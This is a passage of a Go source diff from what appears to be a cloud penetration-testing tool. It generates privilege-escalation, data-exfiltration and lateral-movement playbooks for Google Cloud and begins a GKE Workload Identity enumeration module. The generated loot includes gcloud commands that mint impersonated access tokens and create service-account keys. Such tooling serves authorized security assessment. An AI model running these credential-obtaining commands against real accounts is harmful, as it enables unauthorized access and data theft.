for _, target := range m.ImpersonationTargets { + m.LootMap["whoami-impersonation"].Contents += fmt.Sprintf( + "# Service Account: %s\n"+ + "# Project: %s\n", + target.ServiceAccount, + target.ProjectID, + ) + if target.CanImpersonate { + m.LootMap["whoami-impersonation"].Contents += fmt.Sprintf( + "gcloud auth print-access-token --impersonate-service-account=%s\n", + target.ServiceAccount, + ) + } + if target.CanCreateKeys { + m.LootMap["whoami-impersonation"].Contents += fmt.Sprintf( + "gcloud iam service-accounts keys create key.json --iam-account=%s\n", + target.ServiceAccount, + ) + } + m.LootMap["whoami-impersonation"].Contents += "\n" + } + + // Privilege escalation loot + for _, path := range m.PrivEscPaths { + confidenceNote := "" + if path.Confidence == "potential" { + confidenceNote = "# NOTE: This is a POTENTIAL path based on role name. Actual exploitation depends on resource configuration.\n" + } + m.LootMap["whoami-privesc"].Contents += fmt.Sprintf( + "## %s\n"+ + "# %s\n"+ + "# Source: %s at %s\n"+ + "# Confidence: %s\n"+ + "# Required permissions: %s\n"+ + "%s"+ + "%s\n\n", + path.Permission, + path.Description, + path.SourceRole, + path.SourceScope, + path.Confidence, + path.RequiredPerms, + confidenceNote, + path.Command, + ) + } + + // Data exfiltration capabilities loot + for _, cap := range m.DataExfilCapabilities { + exfilCmd := generateExfilCommand(cap.Permission, cap.Category) + m.LootMap["whoami-data-exfil"].Contents += fmt.Sprintf( + "## %s\n"+ + "# Category: %s\n"+ + "# Description: %s\n"+ + "# Source Role: %s\n"+ + "# Source Scope: %s\n"+ + "%s\n\n", + cap.Permission, + cap.Category, + cap.Description, + cap.SourceRole, + cap.SourceScope, + exfilCmd, + ) + } + + // Lateral movement capabilities loot + for _, cap := range m.LateralMoveCapabilities { + lateralCmd := generateLateralCommand(cap.Permission, cap.Category) + m.LootMap["whoami-lateral-movement"].Contents += fmt.Sprintf( + "## %s\n"+ + "# Category: %s\n"+ + "# Description: %s\n"+ 
+ "# Source Role: %s\n"+ + "# Source Scope: %s\n"+ + "%s\n\n", + cap.Permission, + cap.Category, + cap.Description, + cap.SourceRole, + cap.SourceScope, + lateralCmd, + ) + } + + // Generate playbooks based on FoxMapper findings + m.generatePlaybooks() + } +} + +// generatePlaybooks creates detailed playbooks based on FoxMapper findings +// Uses the same visual path style as the foxmapper module +func (m *WhoAmIModule) generatePlaybooks() { + // Privilege escalation playbook with detailed paths + m.LootMap["whoami-privesc-playbook"].Contents = m.generatePrivescPlaybook() + + // Data exfiltration playbook + m.LootMap["whoami-data-exfil-playbook"].Contents = m.generateDataExfilPlaybook() + + // Lateral movement playbook + m.LootMap["whoami-lateral-movement-playbook"].Contents = m.generateLateralPlaybook() +} + +// generatePrivescPlaybook creates a detailed privesc playbook with FoxMapper path visualization +func (m *WhoAmIModule) generatePrivescPlaybook() string { + var sb strings.Builder + + sb.WriteString(fmt.Sprintf("# Privilege Escalation Playbook for %s\n\n", m.Identity.Email)) + sb.WriteString("This playbook contains privilege escalation paths identified by FoxMapper analysis.\n") + sb.WriteString("Paths show the escalation chain from your current identity to admin principals.\n\n") + + // Summary + sb.WriteString("================================================================================\n") + sb.WriteString("SUMMARY\n") + sb.WriteString("================================================================================\n\n") + sb.WriteString(fmt.Sprintf("Identity: %s (%s)\n", m.Identity.Email, m.Identity.Type)) + sb.WriteString(fmt.Sprintf("Findings with escalation paths: %d\n", len(m.FoxMapperPrivescFindings))) + + // Count total paths and by level + totalPaths := 0 + orgPaths := 0 + folderPaths := 0 + projectPaths := 0 + for _, finding := range m.FoxMapperPrivescFindings { + totalPaths += len(finding.Paths) + orgPaths += finding.PathsToOrgAdmin + 
folderPaths += finding.PathsToFolderAdmin + projectPaths += finding.PathsToProjectAdmin + } + sb.WriteString(fmt.Sprintf("Total escalation paths: %d\n", totalPaths)) + if orgPaths > 0 { + sb.WriteString(fmt.Sprintf(" → Paths to Org Admin: %d\n", orgPaths)) + } + if folderPaths > 0 { + sb.WriteString(fmt.Sprintf(" → Paths to Folder Admin: %d\n", folderPaths)) + } + if projectPaths > 0 { + sb.WriteString(fmt.Sprintf(" → Paths to Project Admin: %d\n", projectPaths)) + } + sb.WriteString("\n") + + // If we have FoxMapper service and findings, show detailed paths + if m.FoxMapperService != nil && len(m.FoxMapperPrivescFindings) > 0 { + for _, finding := range m.FoxMapperPrivescFindings { + if len(finding.Paths) == 0 { + continue + } + + sb.WriteString("================================================================================\n") + sb.WriteString(fmt.Sprintf("SOURCE: %s (%s)\n", finding.Principal, finding.MemberType)) + sb.WriteString(fmt.Sprintf("Highest reachable: %s admin\n", finding.HighestAdminLevel)) + sb.WriteString(fmt.Sprintf("Escalation paths: %d (viable: %d, scope-blocked: %d)\n", + len(finding.Paths), finding.ViablePathCount, finding.ScopeBlockedCount)) + sb.WriteString("================================================================================\n\n") + + for pathIdx, path := range finding.Paths { + scopeStatus := "" + if path.ScopeBlocked { + scopeStatus = " [SCOPE-BLOCKED]" + } + confidenceStatus := "" + if path.Confidence != "" && path.Confidence != "high" { + confidenceStatus = fmt.Sprintf(" [%s confidence]", path.Confidence) + } + + sb.WriteString(fmt.Sprintf("--- Path %d: %s → %s (%s admin, %d hops)%s%s ---\n\n", + pathIdx+1, path.Source, path.Destination, path.AdminLevel, path.HopCount, scopeStatus, confidenceStatus)) + + // Show the path as a visual chain + sb.WriteString(fmt.Sprintf(" %s\n", path.Source)) + for i, edge := range path.Edges { + sb.WriteString(" │\n") + + annotations := "" + if edge.ScopeBlocksEscalation { + annotations = " 
⚠️ BLOCKED BY OAUTH SCOPE" + } else if edge.ScopeLimited { + annotations = " ⚠️ scope-limited" + } + edgeConf := edge.EffectiveConfidence() + if edgeConf != "high" { + annotations += fmt.Sprintf(" [%s confidence]", edgeConf) + } + + sb.WriteString(fmt.Sprintf(" ├── [%d] %s%s\n", i+1, edge.ShortReason, annotations)) + + if edge.Resource != "" { + sb.WriteString(fmt.Sprintf(" │ Resource: %s\n", edge.Resource)) + } + + if edge.Reason != "" && edge.Reason != edge.ShortReason { + reason := edge.Reason + if len(reason) > 80 { + sb.WriteString(fmt.Sprintf(" │ %s\n", reason[:80])) + sb.WriteString(fmt.Sprintf(" │ %s\n", reason[80:])) + } else { + sb.WriteString(fmt.Sprintf(" │ %s\n", reason)) + } + } + + if i < len(path.Edges)-1 { + sb.WriteString(" │\n") + sb.WriteString(" ▼\n") + sb.WriteString(fmt.Sprintf(" %s\n", edge.Destination)) + } else { + sb.WriteString(" │\n") + sb.WriteString(fmt.Sprintf(" └──▶ %s (ADMIN)\n", edge.Destination)) + } + } + sb.WriteString("\n") + } + sb.WriteString("\n") + } + } else if len(m.PrivEscPaths) > 0 { + // Fallback to simplified output if no FoxMapper findings + sb.WriteString("================================================================================\n") + sb.WriteString("ESCALATION PATHS (Summary)\n") + sb.WriteString("================================================================================\n\n") + + for i, path := range m.PrivEscPaths { + sb.WriteString(fmt.Sprintf("### Path %d: %s\n\n", i+1, path.Category)) + sb.WriteString(fmt.Sprintf("- Permission: %s\n", path.Permission)) + sb.WriteString(fmt.Sprintf("- Description: %s\n", path.Description)) + sb.WriteString(fmt.Sprintf("- Source: %s at %s\n", path.SourceRole, path.SourceScope)) + sb.WriteString(fmt.Sprintf("- Confidence: %s\n\n", path.Confidence)) + if path.Command != "" { + sb.WriteString(fmt.Sprintf("```bash\n%s\n```\n\n", path.Command)) + } + } + } + + // Add impersonation targets section if we have any + if len(m.ImpersonationTargets) > 0 { + 
sb.WriteString("================================================================================\n") + sb.WriteString("IMPERSONATION TARGETS (Verified via IAM Policy)\n") + sb.WriteString("================================================================================\n\n") + + for _, target := range m.ImpersonationTargets { + sb.WriteString(fmt.Sprintf("Service Account: %s\n", target.ServiceAccount)) + sb.WriteString(fmt.Sprintf("Project: %s\n", target.ProjectID)) + if target.CanImpersonate { + sb.WriteString(" ✓ Can generate access tokens\n") + sb.WriteString(fmt.Sprintf(" gcloud auth print-access-token --impersonate-service-account=%s\n", target.ServiceAccount)) + } + if target.CanCreateKeys { + sb.WriteString(" ✓ Can create service account keys\n") + sb.WriteString(fmt.Sprintf(" gcloud iam service-accounts keys create key.json --iam-account=%s\n", target.ServiceAccount)) + } + if target.CanActAs { + sb.WriteString(" ✓ Can act as (use with compute, functions, etc.)\n") + } + sb.WriteString("\n") + } + } + + return sb.String() +} + +// generateDataExfilPlaybook creates a detailed data exfil playbook +func (m *WhoAmIModule) generateDataExfilPlaybook() string { + var sb strings.Builder + + sb.WriteString(fmt.Sprintf("# Data Exfiltration Playbook for %s\n\n", m.Identity.Email)) + sb.WriteString("This playbook contains data exfiltration capabilities identified by FoxMapper analysis.\n\n") + + // Summary + sb.WriteString("================================================================================\n") + sb.WriteString("SUMMARY\n") + sb.WriteString("================================================================================\n\n") + sb.WriteString(fmt.Sprintf("Identity: %s (%s)\n", m.Identity.Email, m.Identity.Type)) + sb.WriteString(fmt.Sprintf("Exfiltration techniques: %d\n", len(m.FoxMapperDataExfilFindings))) + sb.WriteString(fmt.Sprintf("Total capabilities: %d\n\n", len(m.DataExfilCapabilities))) + + // Group by service + if 
len(m.FoxMapperDataExfilFindings) > 0 { + sb.WriteString("================================================================================\n") + sb.WriteString("DATA EXFILTRATION TECHNIQUES\n") + sb.WriteString("================================================================================\n\n") + + for _, finding := range m.FoxMapperDataExfilFindings { + sb.WriteString(fmt.Sprintf("--- %s: %s ---\n\n", strings.ToUpper(finding.Service), finding.Technique)) + sb.WriteString(fmt.Sprintf("Permission: %s\n", finding.Permission)) + sb.WriteString(fmt.Sprintf("Description: %s\n\n", finding.Description)) + + sb.WriteString("Principals with access:\n") + for _, principal := range finding.Principals { + adminStatus := "" + if principal.IsAdmin { + adminStatus = " (Admin)" + } + sb.WriteString(fmt.Sprintf(" • %s%s\n", principal.Principal, adminStatus)) + } + sb.WriteString("\n") + + sb.WriteString("Exploitation:\n") + sb.WriteString(fmt.Sprintf(" %s\n\n", finding.Exploitation)) + } + } else if len(m.DataExfilCapabilities) > 0 { + // Fallback + sb.WriteString("================================================================================\n") + sb.WriteString("CAPABILITIES\n") + sb.WriteString("================================================================================\n\n") + + for i, cap := range m.DataExfilCapabilities { + sb.WriteString(fmt.Sprintf("### Capability %d: %s\n\n", i+1, cap.Category)) + sb.WriteString(fmt.Sprintf("- Permission: %s\n", cap.Permission)) + sb.WriteString(fmt.Sprintf("- Description: %s\n", cap.Description)) + sb.WriteString(fmt.Sprintf("- Source: %s at %s\n\n", cap.SourceRole, cap.SourceScope)) + exfilCmd := generateExfilCommand(cap.Permission, cap.Category) + if exfilCmd != "" { + sb.WriteString(fmt.Sprintf("```bash\n%s\n```\n\n", exfilCmd)) + } + } + } + + return sb.String() +} + +// generateLateralPlaybook creates a detailed lateral movement playbook +func (m *WhoAmIModule) generateLateralPlaybook() string { + var sb strings.Builder + + 
sb.WriteString(fmt.Sprintf("# Lateral Movement Playbook for %s\n\n", m.Identity.Email)) + sb.WriteString("This playbook contains lateral movement capabilities identified by FoxMapper analysis.\n\n") + + // Summary + sb.WriteString("================================================================================\n") + sb.WriteString("SUMMARY\n") + sb.WriteString("================================================================================\n\n") + sb.WriteString(fmt.Sprintf("Identity: %s (%s)\n", m.Identity.Email, m.Identity.Type)) + sb.WriteString(fmt.Sprintf("Lateral movement techniques: %d\n", len(m.FoxMapperLateralFindings))) + sb.WriteString(fmt.Sprintf("Total capabilities: %d\n\n", len(m.LateralMoveCapabilities))) + + // Group by category + if len(m.FoxMapperLateralFindings) > 0 { + sb.WriteString("================================================================================\n") + sb.WriteString("LATERAL MOVEMENT TECHNIQUES\n") + sb.WriteString("================================================================================\n\n") + + // Group by category + categories := make(map[string][]foxmapperservice.LateralFinding) + for _, finding := range m.FoxMapperLateralFindings { + categories[finding.Category] = append(categories[finding.Category], finding) + } + + for category, findings := range categories { + sb.WriteString(fmt.Sprintf("=== %s ===\n\n", strings.ToUpper(strings.ReplaceAll(category, "_", " ")))) + + for _, finding := range findings { + sb.WriteString(fmt.Sprintf("--- %s ---\n\n", finding.Technique)) + sb.WriteString(fmt.Sprintf("Permission: %s\n", finding.Permission)) + sb.WriteString(fmt.Sprintf("Description: %s\n\n", finding.Description)) + + sb.WriteString("Principals with access:\n") + for _, principal := range finding.Principals { + adminStatus := "" + if principal.IsAdmin { + adminStatus = " (Admin)" + } + sb.WriteString(fmt.Sprintf(" • %s%s\n", principal.Principal, adminStatus)) + } + sb.WriteString("\n") + + 
sb.WriteString("Exploitation:\n") + sb.WriteString(fmt.Sprintf(" %s\n\n", finding.Exploitation)) + } + } + } else if len(m.LateralMoveCapabilities) > 0 { + // Fallback + sb.WriteString("================================================================================\n") + sb.WriteString("CAPABILITIES\n") + sb.WriteString("================================================================================\n\n") + + for i, cap := range m.LateralMoveCapabilities { + sb.WriteString(fmt.Sprintf("### Capability %d: %s\n\n", i+1, cap.Category)) + sb.WriteString(fmt.Sprintf("- Permission: %s\n", cap.Permission)) + sb.WriteString(fmt.Sprintf("- Description: %s\n", cap.Description)) + sb.WriteString(fmt.Sprintf("- Source: %s at %s\n\n", cap.SourceRole, cap.SourceScope)) + lateralCmd := generateLateralCommand(cap.Permission, cap.Category) + if lateralCmd != "" { + sb.WriteString(fmt.Sprintf("```bash\n%s\n```\n\n", lateralCmd)) + } + } + } + + return sb.String() +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *WhoAmIModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Determine output mode based on hierarchy availability + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *WhoAmIModule) buildTables() []internal.TableFile { + // Identity table + identityHeader := []string{ + "Property", + "Value", + } + + identityBody := [][]string{ + {"Email", m.Identity.Email}, + {"Type", m.Identity.Type}, + } + + // Add project details (expanded) + for i, proj := range m.Identity.Projects { + label := "Project" + if len(m.Identity.Projects) > 1 { + label = fmt.Sprintf("Project %d", i+1) + } + if proj.DisplayName != "" { + identityBody = append(identityBody, []string{label, fmt.Sprintf("%s (%s)", proj.DisplayName, proj.ProjectID)}) + } else { + identityBody = append(identityBody, []string{label, proj.ProjectID}) + } + } + if 
len(m.Identity.Projects) == 0 { + identityBody = append(identityBody, []string{"Projects", "0"}) + } + + // Add organization details (expanded) + for i, org := range m.Identity.Organizations { + label := "Organization" + if len(m.Identity.Organizations) > 1 { + label = fmt.Sprintf("Organization %d", i+1) + } + if org.DisplayName != "" { + identityBody = append(identityBody, []string{label, fmt.Sprintf("%s (%s)", org.DisplayName, org.OrgID)}) + } else { + identityBody = append(identityBody, []string{label, org.OrgID}) + } + } + if len(m.Identity.Organizations) == 0 { + identityBody = append(identityBody, []string{"Organizations", "0"}) + } + + // Add folder details (expanded) + for i, folder := range m.Identity.Folders { + label := "Folder" + if len(m.Identity.Folders) > 1 { + label = fmt.Sprintf("Folder %d", i+1) + } + folderID := strings.TrimPrefix(folder.Name, "folders/") + if folder.DisplayName != "" { + identityBody = append(identityBody, []string{label, fmt.Sprintf("%s (%s)", folder.DisplayName, folderID)}) + } else { + identityBody = append(identityBody, []string{label, folderID}) + } + } + if len(m.Identity.Folders) == 0 { + identityBody = append(identityBody, []string{"Folders", "0"}) + } + + // Add group membership details (expanded) + for i, group := range m.Identity.Groups { + label := "Group" + if len(m.Identity.Groups) > 1 { + label = fmt.Sprintf("Group %d", i+1) + } + + // Build display value with source indicator + var displayValue string + if group.DisplayName != "" && group.Email != "" { + displayValue = fmt.Sprintf("%s (%s)", group.DisplayName, group.Email) + } else if group.Email != "" { + displayValue = group.Email + } else if group.DisplayName != "" { + displayValue = group.DisplayName + } else { + displayValue = group.GroupID + } + + // Add source indicator + if group.Source == "provided" { + displayValue += " (provided)" + } else if group.Source == "enumerated" && m.Identity.GroupsMismatch { + displayValue += " (enumerated)" + } + + 
identityBody = append(identityBody, []string{label, displayValue}) + } + if len(m.Identity.Groups) == 0 { + if m.Identity.GroupsEnumerated { + identityBody = append(identityBody, []string{"Groups", "0"}) + } else { + identityBody = append(identityBody, []string{"Groups", "Unknown (permission denied)"}) + } + } + + // Add role binding details (expanded) + for i, rb := range m.RoleBindings { + label := "Role Binding" + if len(m.RoleBindings) > 1 { + label = fmt.Sprintf("Role Binding %d", i+1) + } + // Format: Role -> Scope (ScopeID) + scopeDisplay := rb.ScopeID + if rb.ScopeName != "" { + scopeDisplay = fmt.Sprintf("%s (%s)", rb.ScopeName, rb.ScopeID) + } + + // Build source/inheritance info + sourceStr := "" + if rb.InheritedFrom != "" && rb.InheritedFrom != "direct" { + if strings.HasPrefix(rb.InheritedFrom, "group:") { + // Group-based binding + sourceStr = fmt.Sprintf(" [via %s]", rb.InheritedFrom) + } else { + // Inherited from parent resource (folder/org) + sourceStr = fmt.Sprintf(" [inherited from %s]", rb.InheritedFrom) + } + } else if rb.InheritedFrom == "direct" { + sourceStr = " [direct]" + } + + identityBody = append(identityBody, []string{label, fmt.Sprintf("%s on %s/%s%s", rb.Role, rb.Scope, scopeDisplay, sourceStr)}) + } + if len(m.RoleBindings) == 0 { + identityBody = append(identityBody, []string{"Role Bindings", "0"}) + } + + // Add extended info to identity table + if m.Extended { + identityBody = append(identityBody, []string{"Impersonation Targets", fmt.Sprintf("%d", len(m.ImpersonationTargets))}) + identityBody = append(identityBody, []string{"Privilege Escalation Paths", fmt.Sprintf("%d", len(m.PrivEscPaths))}) + identityBody = append(identityBody, []string{"Lateral Movement Paths", fmt.Sprintf("%d", len(m.LateralMoveCapabilities))}) + identityBody = append(identityBody, []string{"Data Exfiltration Paths", fmt.Sprintf("%d", len(m.DataExfilCapabilities))}) + } + + // Role bindings table + rolesHeader := []string{ + "Role", + "Scope", + "Scope 
ID", + "Source", + } + + var rolesBody [][]string + for _, rb := range m.RoleBindings { + source := rb.InheritedFrom + if source == "" { + source = "direct" + } + rolesBody = append(rolesBody, []string{ + rb.Role, + rb.Scope, + rb.ScopeID, + source, + }) + } + + // Build tables + tables := []internal.TableFile{ + { + Name: "whoami-identity", + Header: identityHeader, + Body: identityBody, + }, + } + + if len(rolesBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "whoami-roles", + Header: rolesHeader, + Body: rolesBody, + }) + } + + // Extended mode tables + if m.Extended { + // Impersonation targets table + if len(m.ImpersonationTargets) > 0 { + impersonationHeader := []string{ + "Service Account", + "Project", + "Can Impersonate", + "Can Create Keys", + "Can ActAs", + } + + var impersonationBody [][]string + for _, target := range m.ImpersonationTargets { + impersonationBody = append(impersonationBody, []string{ + target.ServiceAccount, + target.ProjectID, + shared.BoolToYesNo(target.CanImpersonate), + shared.BoolToYesNo(target.CanCreateKeys), + shared.BoolToYesNo(target.CanActAs), + }) + } + + tables = append(tables, internal.TableFile{ + Name: "whoami-impersonation", + Header: impersonationHeader, + Body: impersonationBody, + }) + } + + // Combined attack paths table (privesc, data exfil, lateral movement) + totalPaths := len(m.PrivEscPaths) + len(m.DataExfilCapabilities) + len(m.LateralMoveCapabilities) + if totalPaths > 0 { + attackPathsHeader := []string{ + "Type", + "Source Scope", + "Source Role", + "Permission", + "Category", + "Description", + } + + var attackPathsBody [][]string + + // Add privilege escalation paths + for _, path := range m.PrivEscPaths { + attackPathsBody = append(attackPathsBody, []string{ + "Privesc", + path.SourceScope, + path.SourceRole, + path.Permission, + path.Category, + path.Description, + }) + } + + // Add data exfiltration capabilities + for _, cap := range m.DataExfilCapabilities { + attackPathsBody = 
append(attackPathsBody, []string{ + "Exfil", + cap.SourceScope, + cap.SourceRole, + cap.Permission, + cap.Category, + cap.Description, + }) + } + + // Add lateral movement capabilities + for _, cap := range m.LateralMoveCapabilities { + attackPathsBody = append(attackPathsBody, []string{ + "Lateral", + cap.SourceScope, + cap.SourceRole, + cap.Permission, + cap.Category, + cap.Description, + }) + } + + tables = append(tables, internal.TableFile{ + Name: "whoami-attack-paths", + Header: attackPathsHeader, + Body: attackPathsBody, + }) + } + } + + return tables +} + +func (m *WhoAmIModule) collectLootFiles() []internal.LootFile { + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + // Include loot files that have content beyond the header comments + // Headers end with "# WARNING: Only use with proper authorization\n\n" + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + return lootFiles +} + +func (m *WhoAmIModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + // For whoami, output at org level since it's account-level data + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + tables := m.buildTables() + lootFiles := m.collectLootFiles() + + output := WhoAmIOutput{ + Table: tables, + Loot: lootFiles, + } + + // Determine output location - prefer org-level, fall back to project-level + orgID := "" + if len(m.Identity.Organizations) > 0 { + orgID = m.Identity.Organizations[0].OrgID + } else if m.Hierarchy != nil && len(m.Hierarchy.Organizations) > 0 { + orgID = m.Hierarchy.Organizations[0].ID + } + + if orgID != "" { + // Place at org level + outputData.OrgLevelData[orgID] = output + } else if len(m.ProjectIDs) > 0 { + // Fall back to first project level if no org discovered + 
outputData.ProjectLevelData[m.ProjectIDs[0]] = output + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_WHOAMI_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +func (m *WhoAmIModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + tables := m.buildTables() + lootFiles := m.collectLootFiles() + + output := WhoAmIOutput{ + Table: tables, + Loot: lootFiles, + } + + // Write output + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + m.ProjectIDs, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_WHOAMI_MODULE_NAME) + m.CommandCounter.Error++ + } +} + diff --git a/gcp/commands/workloadidentity.go b/gcp/commands/workloadidentity.go new file mode 100644 index 00000000..fd63d2b3 --- /dev/null +++ b/gcp/commands/workloadidentity.go @@ -0,0 +1,591 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + gkeservice "github.com/BishopFox/cloudfox/gcp/services/gkeService" + IAMService "github.com/BishopFox/cloudfox/gcp/services/iamService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" + iam "google.golang.org/api/iam/v1" +) + +var GCPWorkloadIdentityCommand = &cobra.Command{ + Use: globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME, + Aliases: []string{"wi", "gke-identity", "workload-id"}, + Short: "Enumerate GKE Workload Identity (K8s SA -> GCP SA bindings)", + Long: `Enumerate GKE Workload Identity configurations and K8s-to-GCP service account bindings. 
+ +Features: +- Lists GKE clusters with Workload Identity enabled +- Shows Kubernetes service accounts bound to GCP service accounts +- Identifies privilege escalation paths through Workload Identity +- Maps namespace/service account to GCP permissions +- Detects overly permissive bindings + +Security Considerations: +- K8s pods with Workload Identity inherit all permissions of the bound GCP SA +- High-privilege GCP SAs bound to K8s SAs are prime escalation targets +- Any pod in the namespace/SA can assume the GCP identity + +TIP: Run 'identity-federation' to enumerate external identity federation (GitHub Actions, AWS, GitLab CI, etc.). +TIP: Run 'gke' to see full cluster security configuration and node pool details. +TIP: Run foxmapper first to populate the Attack Paths column with privesc/exfil/lateral movement analysis.`, + Run: runGCPWorkloadIdentityCommand, +} + +// WorkloadIdentityBinding represents a binding between K8s SA and GCP SA +type WorkloadIdentityBinding struct { + ProjectID string `json:"projectId"` + ClusterName string `json:"clusterName"` + ClusterLocation string `json:"clusterLocation"` + WorkloadPool string `json:"workloadPool"` + KubernetesNS string `json:"kubernetesNamespace"` + KubernetesSA string `json:"kubernetesServiceAccount"` + GCPServiceAccount string `json:"gcpServiceAccount"` + GCPSARoles []string `json:"gcpServiceAccountRoles"` + IsHighPrivilege bool `json:"isHighPrivilege"` + BindingType string `json:"bindingType"` // "workloadIdentityUser" or "other" +} + +// ClusterWorkloadIdentity represents a cluster's workload identity configuration +type ClusterWorkloadIdentity struct { + ProjectID string `json:"projectId"` + ClusterName string `json:"clusterName"` + Location string `json:"location"` + WorkloadPoolEnabled bool `json:"workloadPoolEnabled"` + WorkloadPool string `json:"workloadPool"` + NodePoolsWithWI int `json:"nodePoolsWithWI"` + TotalNodePools int `json:"totalNodePools"` +} + +// ------------------------------ +// Module 
Struct +// ------------------------------ +type WorkloadIdentityModule struct { + gcpinternal.BaseGCPModule + + ProjectClusters map[string][]ClusterWorkloadIdentity // projectID -> clusters + ProjectBindings map[string][]WorkloadIdentityBinding // projectID -> bindings + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + FoxMapperCache *gcpinternal.FoxMapperCache + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type WorkloadIdentityOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o WorkloadIdentityOutput) TableFiles() []internal.TableFile { return o.Table } +func (o WorkloadIdentityOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPWorkloadIdentityCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME) + if err != nil { + return + } + + module := &WorkloadIdentityModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectClusters: make(map[string][]ClusterWorkloadIdentity), + ProjectBindings: make(map[string][]WorkloadIdentityBinding), + LootMap: make(map[string]map[string]*internal.LootFile), + } + + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *WorkloadIdentityModule) Execute(ctx context.Context, logger internal.Logger) { + m.FoxMapperCache = gcpinternal.GetFoxMapperCacheFromContext(ctx) + if m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { + logger.InfoM("Using FoxMapper cache for attack path analysis", globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME) + } + + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME, m.processProject) + + allClusters := m.getAllClusters() + allBindings 
:= m.getAllBindings() + + if len(allClusters) == 0 { + logger.InfoM("No GKE clusters found", globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME) + return + } + + wiEnabled := 0 + for _, c := range allClusters { + if c.WorkloadPoolEnabled { + wiEnabled++ + } + } + logger.SuccessM(fmt.Sprintf("Found %d GKE cluster(s) (%d with Workload Identity), %d K8s->GCP binding(s)", + len(allClusters), wiEnabled, len(allBindings)), globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME) + + m.writeOutput(ctx, logger) +} + +// getAllClusters returns all clusters from all projects +func (m *WorkloadIdentityModule) getAllClusters() []ClusterWorkloadIdentity { + var all []ClusterWorkloadIdentity + for _, clusters := range m.ProjectClusters { + all = append(all, clusters...) + } + return all +} + +// getAllBindings returns all bindings from all projects +func (m *WorkloadIdentityModule) getAllBindings() []WorkloadIdentityBinding { + var all []WorkloadIdentityBinding + for _, bindings := range m.ProjectBindings { + all = append(all, bindings...) 
+ } + return all +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *WorkloadIdentityModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating GKE Workload Identity in project: %s", projectID), globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME) + } + + gkeSvc := gkeservice.New() + clusters, _, err := gkeSvc.Clusters(projectID) + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME, + fmt.Sprintf("Could not enumerate GKE clusters in project %s", projectID)) + return + } + + var clusterInfos []ClusterWorkloadIdentity + var bindings []WorkloadIdentityBinding + + for _, cluster := range clusters { + cwi := ClusterWorkloadIdentity{ + ProjectID: projectID, + ClusterName: cluster.Name, + Location: cluster.Location, + TotalNodePools: cluster.NodePoolCount, + } + + if cluster.WorkloadIdentity != "" { + cwi.WorkloadPoolEnabled = true + cwi.WorkloadPool = cluster.WorkloadIdentity + } + + if cwi.WorkloadPoolEnabled { + cwi.NodePoolsWithWI = cwi.TotalNodePools + } + + clusterInfos = append(clusterInfos, cwi) + + // If Workload Identity is enabled, look for bindings + if cwi.WorkloadPoolEnabled { + clusterBindings := m.findWorkloadIdentityBindings(ctx, projectID, cluster.Name, cluster.Location, cwi.WorkloadPool, logger) + bindings = append(bindings, clusterBindings...) 
